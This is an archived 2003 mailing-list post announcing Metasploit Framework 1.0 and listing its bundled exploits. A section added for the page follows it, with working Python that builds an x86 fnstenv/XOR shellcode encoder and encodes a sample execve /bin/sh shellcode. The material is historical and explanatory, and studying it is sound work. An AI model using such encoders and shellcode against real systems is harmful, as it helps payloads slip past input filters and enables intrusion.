Penetration Testing mailing list archives

MetaSploit Exploit Framework v1.0


From: H D Moore <sflist () digitaloffense net>
Date: Mon, 6 Oct 2003 15:47:43 -0500

I finally released the first public version of the Exploit Framework code, 
you can grab a copy at:

http://metasploit.com/tools/framework-1.0.tar.gz
http://metasploit.com/tools/framework-1.0.zip

The GUI is still Linux-only and buggy; however, the CLI now runs on every 
common Unix-like platform as well as Windows under ActiveState Perl. The 
Pex library has been overhauled; it now includes the fnstenv xor encoder 
and the updated/optimized versions of the metasploit win32 payloads. 

The Pex code and documentation can be found at:

http://metasploit.com/tools/Pex.pm
http://metasploit.com/projects/Pex/Pex.pod.html

This first release includes exploits for:

- IIS 5.0 nsiislog.dll POST Overflow
- IIS 5.0 NTDLL via WebDAV (working almost 100%, all SP's)
- IIS 5.0 Printer Overflow (one return address for SP0 and SP1)
- MS03-026 RPC DCOM (arbitrary payloads are useful)
- Apache Win32 Chunked Encoding (NT 4.0 and Win2K)
- Samba trans2open Overflow (Linux and FreeBSD)
- Solaris sadmind Command Execution
- War-FTPD 1.65 PASS Overflow (Win2k)

A ton of new ones are on the way; this set was just released to demo/test 
the framework and exploit API. Some highlights of this release:

- Encoded payloads are cached; even though it takes a couple minutes to 
generate a win32bind or win32reverse payload for the WebDAV exploit, you 
will only need to do it once.

- The exploit command shell sessions are logged by default to 
$HOME/.Pex/Session-X.log. This is especially useful for people who need 
to track what they did on each host they compromised.

A completely new shellcode encoding engine is in the works, as well as a 
multi-stage loader for exploiting bugs with extremely limited shellspace. 
I would also like to add the feature to hardcode addresses for one or 
more common OS/SP combinations. The whole thing is released under the 
GPL, have fun :)

-HD
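The post mentions that Pex now ships an fnstenv xor encoder. The following is an added example, written for this page and not code from Pex or the Metasploit Framework: it builds the classic 23-byte x86 fnstenv/XOR decoder stub (the pattern such encoders use, not necessarily byte-identical to Pex's), XORs a payload against a dword key, searches for a key that keeps the result free of caller-specified bad characters, and replays the decoder loop in Python so the round trip can be checked without running the bytes. The function names, the constants, and SAMPLE_PAYLOAD are all assumptions of this example.

```python
"""
Added example (not Pex / Metasploit code): x86 fnstenv/XOR encoder with a
pure-Python emulation of the decoder loop.

Decoder layout (offsets relative to the start of the stub):
  0  31 c9            xor ecx, ecx
  2  b1 NN            mov cl, NN            ; number of encoded dwords
  4  d9 ee            fldz                  ; last FPU instruction executed
  6  d9 74 24 f4      fnstenv [esp-0xc]     ; saved FPU IP lands at [esp]
 10  5b               pop ebx               ; ebx = address of fldz
 11  81 73 13 KKKKKKKK xor dword [ebx+0x13], key
 18  83 eb fc         sub ebx, -4           ; ebx += 4
 21  e2 f4            loop -12              ; back to the xor
 23  <encoded payload>                      ; == fldz + 0x13
"""
import struct

STUB_LEN = 23        # xor ecx,ecx .. loop
FLDZ_OFF = 4         # "pop ebx" yields the address of this fldz
PAYLOAD_DISP = 0x13  # displacement used by the xor: [ebx+0x13]
COUNT_OFF = 3        # imm8 of "mov cl, NN"
KEY_OFF = 14         # imm32 of "xor dword [ebx+0x13], key"

# The stub is only correct if the xor's first target is the byte after the stub.
assert FLDZ_OFF + PAYLOAD_DISP == STUB_LEN

# Constructed sample payload for the demo (a null-free Linux x86 execve stub);
# any byte string up to 1020 bytes works.
SAMPLE_PAYLOAD = (b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1"
                  b"\xb0\x0b\xcd\x80")


def decoder_stub(ndwords: int, key: int) -> bytes:
    """Return the fixed decoder with the dword count and key patched in."""
    if not 1 <= ndwords <= 255:
        raise ValueError("count must fit in cl (1..255 dwords)")
    return (b"\x31\xc9"                                 # xor ecx, ecx
            + b"\xb1" + bytes([ndwords])                # mov cl, ndwords
            + b"\xd9\xee"                               # fldz
            + b"\xd9\x74\x24\xf4"                       # fnstenv [esp-0xc]
            + b"\x5b"                                   # pop ebx
            + b"\x81\x73\x13" + struct.pack("<I", key)  # xor dword [ebx+0x13], key
            + b"\x83\xeb\xfc"                           # sub ebx, -4
            + b"\xe2\xf4")                              # loop


def _pad(payload: bytes) -> bytes:
    # The loop works on whole dwords; pad with NOPs up to a multiple of 4.
    return payload + b"\x90" * (-len(payload) % 4)


def encode(payload: bytes, key: int) -> bytes:
    """Decoder stub followed by the payload XORed dword-wise with key."""
    padded = _pad(payload)
    body = b"".join(
        struct.pack("<I", struct.unpack("<I", padded[i:i + 4])[0] ^ key)
        for i in range(0, len(padded), 4))
    return decoder_stub(len(padded) // 4, key) + body


def has_badchars(blob: bytes, badchars: bytes) -> bool:
    return any(b in blob for b in badchars)


def find_key(payload: bytes, badchars: bytes):
    """Smallest repeated-byte key whose whole encoded blob avoids badchars, or None.

    The stub's fixed bytes are checked too: if a bad char lives in the decoder
    itself no key can help, and None is returned."""
    for b in range(1, 256):
        key = b * 0x01010101
        if not has_badchars(encode(payload, key), badchars):
            return key
    return None


def emulate_decode(blob: bytes) -> bytes:
    """Replay the decoder loop the CPU would execute on `blob` and return
    the decoded bytes that follow the stub."""
    count = blob[COUNT_OFF]                                   # mov cl, NN
    key = struct.unpack("<I", blob[KEY_OFF:KEY_OFF + 4])[0]   # xor imm32
    ebx = FLDZ_OFF                                            # pop ebx
    mem = bytearray(blob)
    for _ in range(count):                                    # loop
        off = ebx + PAYLOAD_DISP
        dw = struct.unpack("<I", mem[off:off + 4])[0] ^ key
        mem[off:off + 4] = struct.pack("<I", dw)
        ebx += 4                                              # sub ebx, -4
    return bytes(mem[STUB_LEN:])


if __name__ == "__main__":
    key = find_key(SAMPLE_PAYLOAD, b"\x00\x0a\x0d")
    blob = encode(SAMPLE_PAYLOAD, key)
    print("key 0x%08x, %d bytes:" % (key, len(blob)), blob.hex())
    print("round trip ok:", emulate_decode(blob) == _pad(SAMPLE_PAYLOAD))
```

The emulation only checks the arithmetic of the loop, not that the stub assembles or that the FPU state is as assumed on the target: the `pop ebx` trick relies on the saved FPU instruction pointer pointing at the `fldz`, so any FPU instruction executed between `fldz` and `fnstenv` (or a payload that needs the original FPU state) breaks it, and the single-byte count limits the payload to 255 dwords.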
